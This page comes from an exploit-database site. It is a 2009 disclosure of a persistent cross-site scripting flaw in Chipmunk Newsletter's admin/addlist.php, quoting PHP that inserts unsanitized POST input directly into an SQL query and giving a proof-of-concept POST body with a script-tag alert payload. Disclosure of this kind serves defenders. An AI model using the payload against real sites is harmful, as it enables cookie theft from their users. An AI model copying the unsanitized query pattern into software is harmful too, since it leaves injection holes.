[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Chipmunk Newsletter Persistant XSS Vulnerability

Author
mr_me
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10117
Category
web applications
Date add
07-12-2009
Platform
unsorted
================================================
Chipmunk Newsletter Persistant XSS Vulnerability
================================================

#################################################################
#
# Tested On: Windows Vista
# Note: For educational purposes only
#
#################################################################
 
There’s probably a lot more vulnerabilities in their web apps, but
I could not even get them to work out of the box..
 
http://server/newsletter/admin/addlist.php
Look no sanitization:
 
8<-------snip---------8<
 
if(isset($_POST['submit']))
   {
     $list=$_POST['list'];
     if(strlen($list)<1)
     {
       print "You did not enter the name of the email list.";
     }
     else
     {
       $addemail="Insert into m_newsletters(newslettername) values('$list')";
       mysql_query($addemail) or die("Could not add list");
       print "List added.";
 
     }
 
8<-------snip---------8<
 
POC POST request:
list=<script>alert('i could get your cookie')</script>&submit=submit



#  0day.today [2024-07-07]  #